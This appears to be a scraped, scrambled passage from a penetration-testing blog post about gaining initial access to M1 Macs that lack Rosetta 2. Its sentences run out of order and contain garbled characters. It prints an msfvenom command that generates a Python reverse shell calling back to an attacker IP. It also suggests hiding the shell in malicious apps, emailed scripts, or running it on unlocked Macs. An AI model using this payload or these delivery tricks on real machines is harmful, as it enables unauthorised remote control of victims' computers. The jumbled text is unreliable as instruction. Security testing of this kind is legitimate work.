The payload is generated via “msfvenom” on our attacker box like below and tells the payload to call back to the attacker’s IP on port 443: msfvenom -p python/shell_reverse_tcp LHOST=10.0.1.189 LPORT=443 Apple has stated that it will be removed in the future ( \_15-release-notes). This example is executed via Python2 that ships by default on macOS as of writing. Let’s start nice and simple with a basic reverse shell, this could be hidden inside a malicious application, a script presented to the user as required for a job function in an email, or quickly ran on an unlocked, unmonitored Mac. Basically, macOS is asking the user to allow Rosetta 2 to be installed, thus allowing 圆4 / non-M1 optimized applications to run, but how does this affect our payloads if we click Not Now and does this make the endpoint any more secure?
From this, we verify it’s running the arm64 version of macOS, the “About this Mac” pane, and finally the popup a user receives when trying to run an application not optimized for M1 processors. Below is a screenshot taken from my freshly deployed Virtual Machine showing output of the “uname -a” command. Fingerprinting a M1 Macįirst, a quick word on M1 Macs and how they act out of the box. The testing environment I’ll be working out of is a standard Kali box acting as the attacker, then a 2021 M1 (not M1 Pro or M1 Max, although these chips would be impacted in the same way) MacBook Pro running macOS Monterey version 12.0.1 in a Virtual Machine without Rosetta 2 installed to demonstrate how this affects initial access and tooling. Initial access comes in many forms in macOS, some of which but are not limited to malicious documents, Installer packages, executables, or malicious scripts a user may be tricked into running. I’ll be going over some of Schellman’s methodology on how we approach an internal engagement knowing that we’ll be landing on macOS and some best recommendations to keep that Mac environment secure. It’s a niche that is commonly perceived to be more secure than your typical Windows domain out of obscurity and even more so when you throw M1 based Macs into the mix.
Mac based corporate environments may be rare but finding a penetration testing team experienced enough to thoroughly test that environment can be even more rare.
0 kommentar(er)
